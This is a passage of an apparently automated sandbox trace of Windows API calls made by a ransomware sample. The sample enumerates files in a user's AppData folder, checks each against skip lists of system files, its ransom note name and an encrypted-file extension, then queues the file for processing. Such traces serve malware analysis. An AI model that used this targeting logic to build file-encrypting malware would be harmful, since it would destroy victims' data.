psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.474] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.475] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="pMTil.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" [0072.475] PathFindExtensionW (pszPath="pMTil.png") returned=".png" [0072.475] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="bootsect.bak") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="iconcache.db") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="thumbs.db") returned -1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2=" ransomware ") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2=" ransom ") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="debug.txt") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="boot.ini") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="desktop.ini") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="autorun.inf") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="ntuser.dat") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="ntldr") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="ntdetect.com") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="bootfont.bin") returned 1 [0072.475] StrCmpIW (psz1="pMTil.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.475] PathFindExtensionW (pszPath="pMTil.png") returned=".png" [0072.475] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.475] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.475] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.475] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.475] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.475] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" [0072.475] SetEvent (hEvent=0x408) returned 1 [0072.475] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb8ec20, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x4d8cc740, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x4d8cc740, ftLastWriteTime.dwHighDateTime=0x1d5eee9, nFileSizeHigh=0x0, nFileSizeLow=0x18b33, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="QsWrg_KB.mp3", cAlternateFileName="")) returned 1 [0072.475] StrCmpW (psz1="QsWrg_KB.mp3", psz2=".") returned 1 [0072.475] StrCmpW (psz1="QsWrg_KB.mp3", psz2="..") returned 1 [0072.475] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.475] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.475] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="QsWrg_KB.mp3", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" [0072.476] PathFindExtensionW (pszPath="QsWrg_KB.mp3") returned=".mp3" [0072.476] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="bootsect.bak") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="iconcache.db") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="thumbs.db") returned -1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2=" ransomware ") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2=" ransom ") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="debug.txt") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="boot.ini") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="desktop.ini") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="autorun.inf") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="ntuser.dat") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="ntldr") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="ntdetect.com") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="bootfont.bin") returned 1 [0072.476] StrCmpIW (psz1="QsWrg_KB.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.476] PathFindExtensionW (pszPath="QsWrg_KB.mp3") returned=".mp3" [0072.476] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.476] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.476] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.476] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.488] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.488] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" [0072.488] SetEvent (hEvent=0x3fc) returned 1 [0072.489] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1f48f0, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x4a2ac600, ftLastAccessTime.dwHighDateTime=0x1d5e571, ftLastWriteTime.dwLowDateTime=0x4a2ac600, ftLastWriteTime.dwHighDateTime=0x1d5e571, nFileSizeHigh=0x0, nFileSizeLow=0x16d6a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s8RH8_.mp3", cAlternateFileName="")) returned 1 [0072.489] StrCmpW (psz1="s8RH8_.mp3", psz2=".") returned 1 [0072.489] StrCmpW (psz1="s8RH8_.mp3", psz2="..") returned 1 [0072.489] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.489] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.489] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="s8RH8_.mp3", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" [0072.489] PathFindExtensionW (pszPath="s8RH8_.mp3") returned=".mp3" [0072.489] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="bootsect.bak") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="iconcache.db") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="thumbs.db") returned -1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2=" ransomware ") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2=" ransom ") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="debug.txt") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="boot.ini") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="desktop.ini") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="autorun.inf") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="ntuser.dat") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="ntldr") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="ntdetect.com") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="bootfont.bin") returned 1 [0072.489] StrCmpIW (psz1="s8RH8_.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.489] PathFindExtensionW (pszPath="s8RH8_.mp3") returned=".mp3" [0072.489] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.489] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.489] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.489] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.499] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.499] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" [0072.499] SetEvent (hEvent=0x418) returned 1 [0072.499] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac925c0, ftCreationTime.dwHighDateTime=0x1d5e2ad, ftLastAccessTime.dwLowDateTime=0x51c69580, ftLastAccessTime.dwHighDateTime=0x1d5edda, ftLastWriteTime.dwLowDateTime=0x51c69580, ftLastWriteTime.dwHighDateTime=0x1d5edda, nFileSizeHigh=0x0, nFileSizeLow=0x1c27, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SKsJaHK4avL.odp", cAlternateFileName="SKSJAH~1.ODP")) returned 1 [0072.499] StrCmpW (psz1="SKsJaHK4avL.odp", psz2=".") returned 1 [0072.499] StrCmpW (psz1="SKsJaHK4avL.odp", psz2="..") returned 1 [0072.499] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.499] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.499] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="SKsJaHK4avL.odp", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" [0072.499] PathFindExtensionW (pszPath="SKsJaHK4avL.odp") returned=".odp" [0072.499] StrCmpW (psz1=".odp", psz2=".txd0t") returned -1 [0072.499] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="bootsect.bak") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="iconcache.db") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="thumbs.db") returned -1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2=" ransomware ") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2=" ransom ") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="debug.txt") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="boot.ini") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="desktop.ini") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="autorun.inf") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="ntuser.dat") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="ntldr") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="ntdetect.com") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="bootfont.bin") returned 1 [0072.500] StrCmpIW (psz1="SKsJaHK4avL.odp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.500] PathFindExtensionW (pszPath="SKsJaHK4avL.odp") returned=".odp" [0072.500] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odp") returned 0x0 [0072.500] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.500] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.500] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.511] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.511] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" [0072.511] SetEvent (hEvent=0x408) returned 1 [0072.511] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0072.511] StrCmpW (psz1="Skype", psz2=".") returned 1 [0072.511] StrCmpW (psz1="Skype", psz2="..") returned 1 [0072.511] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.511] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.511] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Skype", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0072.511] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system32\\") returned 0x0 [0072.511] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.511] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system\\") returned 0x0 [0072.511] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.512] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Skype" [0072.512] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe46ce0, ftCreationTime.dwHighDateTime=0x1d5e3af, ftLastAccessTime.dwLowDateTime=0xab0ee800, ftLastAccessTime.dwHighDateTime=0x1d5e1c7, ftLastWriteTime.dwLowDateTime=0xab0ee800, ftLastWriteTime.dwHighDateTime=0x1d5e1c7, nFileSizeHigh=0x0, nFileSizeLow=0x13535, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="sT1K.flv", cAlternateFileName="")) returned 1 [0072.512] StrCmpW (psz1="sT1K.flv", psz2=".") returned 1 [0072.512] StrCmpW (psz1="sT1K.flv", psz2="..") returned 1 [0072.512] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.512] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.512] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="sT1K.flv", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" [0072.512] PathFindExtensionW (pszPath="sT1K.flv") returned=".flv" [0072.512] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="bootsect.bak") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="iconcache.db") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="thumbs.db") returned -1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2=" ransomware ") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2=" ransom ") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="debug.txt") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="boot.ini") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="desktop.ini") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="autorun.inf") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="ntuser.dat") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="ntldr") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="ntdetect.com") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="bootfont.bin") returned 1 [0072.512] StrCmpIW (psz1="sT1K.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.512] PathFindExtensionW (pszPath="sT1K.flv") returned=".flv" [0072.512] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0072.512] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.512] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.512] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.512] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.512] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" [0072.513] SetEvent (hEvent=0x3fc) returned 1 [0072.513] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0072.513] StrCmpW (psz1="Sun", psz2=".") returned 1 [0072.513] StrCmpW (psz1="Sun", psz2="..") returned 1 [0072.513] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.513] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.513] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Sun", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0072.513] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0072.513] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.513] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0072.513] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.513] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Sun" [0072.513] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4573a5c0, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0xf0e99590, ftLastAccessTime.dwHighDateTime=0x1d5e434, ftLastWriteTime.dwLowDateTime=0xf0e99590, ftLastWriteTime.dwHighDateTime=0x1d5e434, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U6XvU G.bmp", cAlternateFileName="U6XVUG~1.BMP")) returned 1 [0072.513] StrCmpW (psz1="U6XvU G.bmp", psz2=".") returned 1 [0072.513] StrCmpW (psz1="U6XvU G.bmp", psz2="..") returned 1 [0072.513] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.513] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.513] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U6XvU G.bmp", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" [0072.513] PathFindExtensionW (pszPath="U6XvU G.bmp") returned=".bmp" [0072.513] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="bootsect.bak") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="iconcache.db") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="thumbs.db") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2=" ransomware ") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2=" ransom ") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="debug.txt") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="boot.ini") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="desktop.ini") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="autorun.inf") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="ntuser.dat") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="ntldr") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="ntdetect.com") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="bootfont.bin") returned 1 [0072.513] StrCmpIW (psz1="U6XvU G.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.514] PathFindExtensionW (pszPath="U6XvU G.bmp") returned=".bmp" [0072.514] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.514] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: 